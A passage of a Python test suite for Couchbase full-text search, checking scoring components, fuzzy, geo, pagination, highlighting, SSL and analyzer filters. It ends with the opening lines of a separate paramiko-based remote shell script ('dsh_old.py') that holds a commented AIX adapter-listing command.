bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, idf1, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("IDF score for Doc ID 1 = %s" % idf1)
_, _, idf2, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='lazy')
self.log.info( "IDF score for Doc ID 2 = %s" % idf2)
self.assertTrue(idf1 > idf2, "Testcase failed. IDF score for Doc1 "
"for search term 'cat' not > that of search term 'lazy'")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_field_norm_score(self):
"""
Test if the Field Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, field_norm1, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 1 = %s" % field_norm1)
_, field_norm2, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 2 = %s" % field_norm2)
_, field_norm3, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 3 = %s" % field_norm3)
self.assertTrue(field_norm1 > field_norm2 > field_norm3,
"Testcase failed. Field Normalization score for "
"Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_query_norm_score(self):
"""
Test if the Query Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, query_norm1, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 1 = %s" % query_norm1)
_, _, _, query_norm2, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 2 = %s" % query_norm2)
_, _, _, query_norm3, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 3 = %s" % query_norm3)
self.assertTrue(query_norm1 == query_norm2 == query_norm3,
"Testcase failed. Query Normalization score for "
"Doc1 != Doc2 != Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_coord_score(self):
"""
Test if the Coord score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, _, coord1 = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 1 = %s" % coord1)
_, _, _, _, coord2 = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 2 = %s" % coord2)
self.assertTrue(coord1 < coord2,
"Testcase failed. Coord score for Doc1 not < Doc2")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_fuzzy_query(self):
"""
Test if fuzzy queries work fine
"""
test_data = [{"text":"simmer"},
{"text":"dimmer"},
{"text":"hammer"},
{"text":"shimmer"},
{"text":"rubber"},
{"text":"jabber"},
{"text":"kilmer"},
{"text":"year"},
{"text":"mumma"},
{"text":"tool stemmer"},
{"text":"he is weak at grammar"},
{"text":"sum of all the rows"}]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, content, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Docs in Search results = %s" % content)
self.log.info("Expected Docs = %s" % self.expected_docs)
if hits>0:
all_expected_docs_present = True
for doc in self.expected_docs_list:
all_expected_docs_present &= index.is_doc_present_in_query_result_content(content, doc)
self.assertTrue(all_expected_docs_present, "All expected docs not in search results")
def test_pagination_of_search_results(self):
max_matches = self._input.param("query_max_matches", 10000000)
show_results_from_item = self._input.param("show_results_from_item", 0)
self.load_data()
self.wait_till_items_in_bucket_equal(items = self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match_all": "true", "field":"name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
sort_params = self.build_sort_params()
for index in self._cb_cluster.get_indexes():
hits, doc_ids, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
show_results_from_item=show_results_from_item)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % doc_ids)
if hits:
self.log.info("Count of docs on page = %s" % len(doc_ids))
if (show_results_from_item >= 0 and show_results_from_item <=self._num_items):
items_on_page = self._num_items - show_results_from_item
elif show_results_from_item < 0:
items_on_page = self._num_items
show_results_from_item = 0
else:
items_on_page = 0
expected_items_on_page = min(items_on_page, max_matches)
self.assertEqual(len(doc_ids), expected_items_on_page, "Items per page are not correct")
doc_id_prefix='emp'
first_doc_id = 10000001
i = 0
expected_doc_present = True
while i < expected_items_on_page:
expected_doc_id = doc_id_prefix+str(first_doc_id+i+show_results_from_item)
expected_doc_present &= (expected_doc_id in doc_ids)
if not expected_doc_present:
self.log.info("Doc ID %s not in the search results page" % expected_doc_id)
i += 1
self.assertTrue(expected_doc_present, "Some docs not present in the results page")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_snippets_highlighting_of_search_term_in_results(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping("name", "text")
index.add_child_field_to_default_mapping("manages.reports", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
n1ql_results = None
if self.run_via_n1ql:
n1ql_query = "select b, search_meta(b.oouutt) as meta from default b where " \
"search(b, {\"query\": " + json.dumps(
query) + ", \"explain\": true, \"highlight\": {}},{\"out\": \"oouutt\"})"
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
highlight=True,
highlight_style=self.highlight_style,
highlight_fields=self.highlight_fields_list)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
self.expected_results = json.loads(self.expected_results)
if hits:
for expected_doc in self.expected_results:
result &= index.validate_snippet_highlighting_in_result_content(
contents, expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if self.run_via_n1ql:
result &= index.validate_snippet_highlighting_in_result_content_n1ql(
n1ql_results['results'], expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_geo_query(self):
"""
Tests both geo location and bounding box queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_queries(geo_index, self.num_queries)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_geo_polygon_query(self):
"""
Tests both geo polygon queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_polygon_queries(geo_index, self.num_queries, self.polygon_feature, self.num_vertices)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_geo_polygon_on_edge_corner_query(self):
expected_hits = int(self._input.param("expected_hits", 0))
expected_doc_ids = self._input.param("expected_doc_ids", None)
polygon_points = str(self._input.param("polygon_points", None))
geo_index = self.create_geo_index_and_load()
query = '{"field": "geo", "polygon_points" : ' + polygon_points + '}'
self.log.info(query)
query = json.loads(query)
contents = ""
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
for doc_id in expected_doc_ids.split(","):
doc_exist = False
for content in contents:
if content['id'] == doc_id:
self.log.info(content)
doc_exist = True
if not doc_exist:
self.fail("expected doc_id : " + str(doc_id) + " does not exist")
def test_geo_polygon_with_holes_must_not(self):
geo_index = self.create_geo_index_and_load()
query = '{"must": {"conjuncts": [{"field": "geo", "polygon_points": ' \
'[[-124.29807832031247, 38.01868304390075], ' \
'[-122.34800507812497, 37.12617594722073], [-120.52976777343747, 38.35114759945404], ' \
'[-120.72752167968747, 39.44978110907268], [-122.90834850139811, 40.22582625155702], ' \
'[-124.24868053264811, 39.61072953444142]]}]}, ' \
'"must_not": {"disjuncts": [{"field": "geo", "polygon_points": ' \
'[[-122.56773164062497, 39.72703407666045], ' \
'[-123.02915742187497, 38.96238669420149], [-122.07334687499997, 38.189396892659744], ' \
'[-120.79893281249997, 38.585519836298694]]}]}}'
self.log.info(query)
query = json.loads(query)
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=False,
expected_hits=18,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
def test_sort_geo_query(self):
"""
Generate random geo location queries and compare the results against
Elasticsearch
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
from .random_query_generator.rand_query_gen import FTSESQueryGenerator
testcase_failed = False
for i in range(self.num_queries):
self.log.info("Running Query no --> " + str(i))
fts_query, es_query = FTSESQueryGenerator.construct_geo_location_query()
print(fts_query)
print(("fts_query location ---> " + str(fts_query["location"])))
# If query has geo co-ordinates in form of an object
if "lon" in fts_query["location"]:
lon = fts_query["location"]["lon"]
lat = fts_query["location"]["lat"]
# If query has geo co-ordinates in form of a list
elif isinstance(fts_query["location"], list):
lon = fts_query["location"][0]
lat = fts_query["location"][1]
# If query has geo co-ordinates in form of a string or geohash
elif isinstance(fts_query["location"], str):
# If the location is in string format
if "," in fts_query["location"]:
lat = float(fts_query["location"].split(",")[0])
lon = float(fts_query["location"].split(",")[1])
else:
lat = float(Geohash.decode(fts_query["location"])[0])
lon = float (Geohash.decode(fts_query["location"])[1])
unit = fts_query["distance"][-2:]
location = None
case = random.randint(0, 3)
# Geo location as an object
if case == 0:
location = {"lon": lon,
"lat": lat}
# Geo Location as array
if case == 1:
location = [lon, lat]
# Geo Location as string
if case == 2:
location = "{0},{1}".format(lat, lon)
# Geo Location as Geohash
if case == 3:
geohash = Geohash.encode(lat, lon, precision=random.randint(3, 8))
location = geohash
print(("sort_fields_location ----> " + str(location)))
sort_fields = [
{
"by": "geo_distance",
"field": "geo",
"unit": unit,
"location": location
}
]
hits, doc_ids, _, _ = geo_index.execute_query(
query=fts_query,
sort_fields=sort_fields)
self.log.info("Hits from FTS: {0}".format(hits))
self.log.info("First 50 docIDs: {0}". format(doc_ids[:50]))
sort_fields_es = [
{
"_geo_distance": {
"geo": location,
"order": "asc",
"unit": unit
}
}
]
es_query["sort"] = sort_fields_es
hits2, doc_ids2, _ = self.es.search(index_name="es_index",
query=es_query)
self.log.info("Hits from ES: {0}".format(hits2))
self.log.info("First 50 doc_ids: {0}".format(doc_ids2[:50]))
if doc_ids==doc_ids2:
self.log.info("PASS: Sort order matches!")
else:
msg = "FAIL: Sort order mismatch!"
self.log.error(msg)
testcase_failed = True
self.log.info("--------------------------------------------------"
"--------------------------------------------------")
if testcase_failed:
self.fail(msg)
def test_xattr_support(self):
"""
Tests if setting includeXAttrs in index definition
breaks anything
:return: Nothing
"""
self.load_data()
index = self._cb_cluster.create_fts_index(
name='default_index',
source_name='default',
source_params={"includeXAttrs": True})
self.is_index_partitioned_balanced(index)
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def test_ssl(self):
"""
Tests if we are able to create an index and query over ssl port
:return: Nothing
"""
fts_ssl_port=18094
import json, subprocess
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
self.load_data()
cert = RestConnection(self._master).get_cluster_ceritificate()
f = open('cert.pem', 'w')
f.write(cert)
f.close()
fts_node = self._cb_cluster.get_random_fts_node()
cmd = "curl -g -k "+\
"-XPUT -H \"Content-Type: application/json\" "+\
"-u Administrator:password "+\
"https://{0}:{1}/api/index/default_idx -d ".\
format(fts_node.ip, fts_ssl_port) +\
"\'{0}\'".format(json.dumps(idx))
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
if json.loads(output)["status"] == "ok":
query = "curl -g -k " + \
"-XPOST -H \"Content-Type: application/json\" " + \
"-u Administrator:password " + \
"https://{0}:18094/api/index/default_idx/query -d ". \
format(fts_node.ip, fts_ssl_port) + \
"\'{0}\'".format(json.dumps(qry))
self.sleep(20, "wait for indexing to complete")
output = subprocess.check_output(query, shell=True)
self.log.info("Hits: {0}".format(json.loads(output)["total_hits"]))
if int(json.loads(output)["total_hits"]) != 1000:
self.fail("Query over ssl failed!")
else:
self.fail("Index could not be created over ssl")
def test_json_types(self):
import couchbase
self.load_data()
self.create_simple_default_index()
master = self._cb_cluster.get_master_node()
dic ={}
dic['null'] = None
dic['number'] = 12345
dic['date'] = "2018-01-21T18:25:43-05:00"
dic['bool'] = True
dic['string'] = "sample string json"
dic['array'] = ['element1', 1234, True]
try:
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
cluster = Cluster('couchbase://{0}'.format(master.ip))
authenticator = PasswordAuthenticator('Administrator', 'password')
cluster.authenticate(authenticator)
cb = cluster.open_bucket('default')
for key, value in list(dic.items()):
cb.upsert(key, value)
except Exception as e:
self.fail(e)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, 5, self.query_types)
self.run_query_and_compare(index)
# This test is to validate if the value for score is 0 for all docs when score=none is specified in the search query.
def test_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items // 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
if hits == expected_hits:
for doc in contents:
# Check if the score of the doc is 0.
if "score" in doc:
self.assertEqual(doc["score"], 0, "Score is not 0 for doc {0}".format(doc["id"]))
else:
self.fail("Score key not present in search results for doc {0}".format(doc["id"]))
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
else:
self.fail("No. of hits not matching expected hits. Hits = {0}, Expected Hits = {1}".format(hits,
expected_hits))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
# This test checks the correctness of search results from queries with score=none and without score=none.
def test_result_correctness_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items // 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, doc_ids_with_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_with_score_none)
doc_ids_with_score_none.sort()
hits, doc_ids_without_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False)
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_without_score_none)
doc_ids_without_score_none.sort()
self.assertListEqual(doc_ids_with_score_none, doc_ids_without_score_none, "Doc Ids not equal")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
# Tests the ASCII folding filter with different types of accented characters
def test_ascii_folding_filter(self):
# Reference for test data : http://www.jarte.com/help_new/accent_marks_diacriticals_and_special_characters.html
test_data = [
{"text": "Ápple"},
{"text": "Àpple"},
{"text": "Äpple"},
{"text": "Âpple"},
{"text": "Ãpple"},
{"text": "Åpple"},
{"text": "ápple"},
{"text": "àpple"},
{"text": "äpple"},
{"text": "âpple"},
{"text": "ãpple"},
{"text": "åpple"},
{"text": "Ðodge"},
{"text": "ðodge"},
{"text": "Élephant"},
{"text": "élephant"},
{"text": "Èlephant"},
{"text": "èlephant"},
{"text": "Ëlephant"},
{"text": "ëlephant"},
{"text": "Êlephant"},
{"text": "êlephant"},
{"text": "Íceland"},
{"text": "íceland"},
{"text": "Ìceland"},
{"text": "ìceland"},
{"text": "Ïceland"},
{"text": "ïceland"},
{"text": "Îceland"},
{"text": "îceland"},
{"text": "Órange"},
{"text": "órange"},
{"text": "Òrange"},
{"text": "òrange"},
{"text": "Örange"},
{"text": "örange"},
{"text": "Ôrange"},
{"text": "ôrange"},
{"text": "Õrange"},
{"text": "õrange"},
{"text": "Ørange"},
{"text": "ørange"},
{"text": "Únicorn"},
{"text": "únicorn"},
{"text": "Ùnicorn"},
{"text": "ùnicorn"},
{"text": "Ünicorn"},
{"text": "ünicorn"},
{"text": "Ûnicorn"},
{"text": "ûnicorn"},
{"text": "Ýellowstone"},
{"text": "ýellowstone"},
{"text": "Ÿellowstone"},
{"text": "ÿellowstone"},
{"text": "Ñocturnal"},
{"text": "ñocturnal"},
{"text": "Çelcius"},
{"text": "çelcius"},
{"text": "Œlcius"},
{"text": "œlcius"},
{"text": "Šmall"},
{"text": "šmall"},
{"text": "Žebra"},
{"text": "žebra"},
{"text": "Æsthetic"},
{"text": "æsthetic"},
{"text": "Þhonetic"},
{"text": "þhonetic"},
{"text": "Discuß"},
{"text": "ÆꜴ"}
]
search_terms = [
{"term": "apple", "expected_hits": 6},
{"term": "Apple", "expected_hits": 6},
{"term": "dodge", "expected_hits": 1},
{"term": "Dodge", "expected_hits": 1},
{"term": "Elephant", "expected_hits": 4},
{"term": "elephant", "expected_hits": 4},
{"term": "iceland", "expected_hits": 4},
{"term": "Iceland", "expected_hits": 4},
{"term": "orange", "expected_hits": 6},
{"term": "Orange", "expected_hits": 6},
{"term": "unicorn", "expected_hits": 4},
{"term": "Unicorn", "expected_hits": 4},
{"term": "yellowstone", "expected_hits": 2},
{"term": "Yellowstone", "expected_hits": 2},
{"term": "nocturnal", "expected_hits": 1},
{"term": "Nocturnal", "expected_hits": 1},
{"term": "celcius", "expected_hits": 1},
{"term": "Celcius", "expected_hits": 1},
{"term": "oelcius", "expected_hits": 1},
{"term": "OElcius", "expected_hits": 1},
{"term": "small", "expected_hits": 1},
{"term": "Small", "expected_hits": 1},
{"term": "zebra", "expected_hits": 1},
{"term": "Zebra", "expected_hits": 1},
{"term": "aesthetic", "expected_hits": 1},
{"term": "AEsthetic", "expected_hits": 1},
{"term": "thhonetic", "expected_hits": 1},
{"term": "THhonetic", "expected_hits": 1},
{"term": "Discuss", "expected_hits": 1},
{"term": "AEAO", "expected_hits": 1}
]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
# Update index to have a custom analyzer which uses the ascii folding filter as a char filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"asciiff\": {\"char_filters\": [\"asciifolding\"],\"tokenizer\": \"letter\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "asciiff"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_snowball_stemmer_token_filter(self):
# Reference for test data : http://www.jarte.com/help_new/accent_marks_diacriticals_and_special_characters.html
all_test_data = {
"generic": [
{"text": "This is something else 1"},
{"text": "This is something else 2"},
{"text": "This is other indtadfgadad"},
{"text": "This is not that"}
],
"test_hu_data": [
{"text": "This is babakocsi"},
{"text": "This is babakocsijáért"},
{"text": "This is babakocsit"},
{"text": "This is babakocsiért"}
],
"test_da_data": [
{"text": "This is indtage"},
{"text": "This is indtagelse"},
{"text": "This is indtager"},
{"text": "This is indtages"},
{"text": "This is indtaget"}
],
"test_fr_data": [
{"text": "This is continu"},
{"text": "This is continua"},
{"text": "This is continuait"},
{"text": "This is continuant"},
{"text": "This is continuation"}
],
"test_en_data": [
{"text": "This is enjoying"},
{"text": "This is enjoys"},
{"text": "This is enjoy"},
{"text": "This is enjoyed"},
{"text": "This is enjoyments"}
],
"test_it_data": [
{"text": "This is abbandonata"},
{"text": "This is abbandonate"},
{"text": "This is abbandonati"},
{"text": "This is abbandonato"},
{"text": "This is abbandonava"}
],
"test_es_data": [
{"text": "This is torá"},
{"text": "This is toreado"},
{"text": "This is toreándolo"},
{"text": "This is toreara"},
{"text": "This is torear"}
],
"test_de_data": [
{"text": "This is aufeinanderfolge"},
{"text": "This is aufeinanderfolgen"},
{"text": "This is aufeinanderfolgend"},
{"text": "This is aufeinanderfolgende"},
{"text": "This is aufeinanderfolgenden"}
]
}
all_search_terms = {
"search_hu_terms": [
{"term": "babakocs", "expected_hits": 4}
],
"search_da_terms": [
{"term": "indtag", "expected_hits": 5}
],
"search_fr_terms": [
{"term": "continu", "expected_hits": 5}
],
"search_en_terms": [
{"term": "enjoy", "expected_hits": 5}
],
"search_it_terms": [
{"term": "abbandon", "expected_hits": 5}
],
"search_es_terms": [
{"term": "tor", "expected_hits": 5}
],
"search_de_terms": [
{"term": "aufeinanderfolg", "expected_hits": 5}
]
}
test_data = all_test_data[self._input.param("test_data", "test_da_data")] + all_test_data["generic"]
search_terms = all_search_terms[self._input.param("search_terms", "search_da_terms")]
token_filter = self._input.param("token_filter", "stemmer_da_snowball")
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
# Update index to have a custom analyzer which uses the ascii folding filter as a char filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"customAnalyzer1\": {\"token_filters\": [\"" + token_filter + "\"],\"tokenizer\": \"whitespace\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "customAnalyzer1"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
|
dsh_old.py
|
import paramiko
import sys
import datetime
import threading
import logging
"""
Edit this line and add your command
"""
#cmd2run = "for f in $(ioscli lsdev -type adapter | grep fcs | grep 8Gb | awk {'print $1'}); do wwpn=$(ioscli lsdev -dev $f -vpd | grep Network | sed s'/\.//g;s/Network Address//g;s/ //g');echo $f,$wwpn; done"
